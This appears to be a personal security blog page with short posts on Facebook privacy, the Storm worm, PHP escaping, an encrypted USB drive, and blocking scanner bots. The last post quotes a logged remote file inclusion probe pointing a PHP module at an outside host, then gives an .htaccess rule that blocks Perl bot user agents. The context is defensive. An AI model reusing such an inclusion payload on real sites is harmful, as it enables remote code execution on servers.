13337

This article pretty much summarizes how I feel about all social networking websites such as Facebook and Myspace - they're just huge dumps for saving all sorts of personal information you shouldn't be giving out. No matter what you use social networking websites for (ie: catching up with old friends, sending messages, etc.), it's possible to do these things without giving out excessive information, but people are often drawn to doing these things.

The idea of Facebook as a US government project makes a good conspiracy theory, but you don't need a tinfoil hat to realise that its 30-plus million users are storing huge amounts of personal data such as their address and interests on the service.If you use it to its full potential, you can share details not just of your interests, but your employment, educational history, sexual orientation, friends and family and even day-to-day activities. If you don't change the default privacy settings, you could be sharing that information not just with people you know but with entire cities or even countries that have made their own groups.

Read the rest here.

I couldn't help but notice this while I was doing my daily Stumbling. Just goes to show that hackers are mighty creative when it comes to protecting their assets.

The Storm worm is fighting back against security researchers that seek to destroy it and has them running scared, Interop New York show attendees heard Tuesday.The worm can figure out which users are trying to probe its command-and-control servers, and it retaliates by launching DDoS attacks against them, shutting down their Internet access for days, says Josh Corman, host-protection architect for IBM/ISS, who led a session on network threats.

Read the rest here.

There's something I have recently noticed among PHP "security experts" (people who have had their software criticized at some point or other for poor security, and Googled "php security"). For some reason, some PHP developers have this idea that mysql_escape_string or mysql_real_escape_string is the answer to all of their problems. Wrong, wrong, wrong, wrong, wrong, wrong, WRONG. Read the rest of this entry »

Ever since I saw it, I knew I had to have an IronKey flashdrive. Some features:

• Fast 30MBPS Read, 20MBPS Write
• Drive contents encrypted with AES CBC-Mode Encryption
• Onboard IronKey Password-manager keeps all your internet passwords safe
• Secure version of Firefox included that encrypts all your web-surfing traffic
• Encased in a potted metal case, not plastic, making it one of the strongest USB keys around
• Exceeds MIL-STD-810F military waterproofing standards
• The encryption chip self-destructs if an invasive attack is detected
• If your Ironkey is lost, you can restore from a secure backup to a new Ironkey in minutes
• Dual channel SLC NAND Flash for high-quality and read/write speeds

Anyone feeling generous?

I see Perl bots crawling my website hundreds of times a month because I have posted some vulnerabilities here that show up in Google, thus making the bot think my site is vulnerable. This isn't a big deal as far as my site being defaced - I don't run the things they look for. However, it is quite an annoyance to see hundreds and hundreds of requests that look like this:

/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xxx?
	Http Code: 301 	Date: Sep 19 18:50:37 	Http Version: HTTP/1.1 	Size in Bytes: -
	Referer: -
	Agent: libwww-perl/5.79

So I added this to my .htaccess file, and poof. They get a 403.

<IfModule>
RewriteCond %{HTTP_USER_AGENT} ^lwp- [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-
RewriteRule ^.* - [F,L]
</IfModule>

You can add any User-Agents you want to with this, I just chose some common ones. This needs to go at the top of the .htaccess file if you have something like WordPress permalink redirects set up in your .htaccess.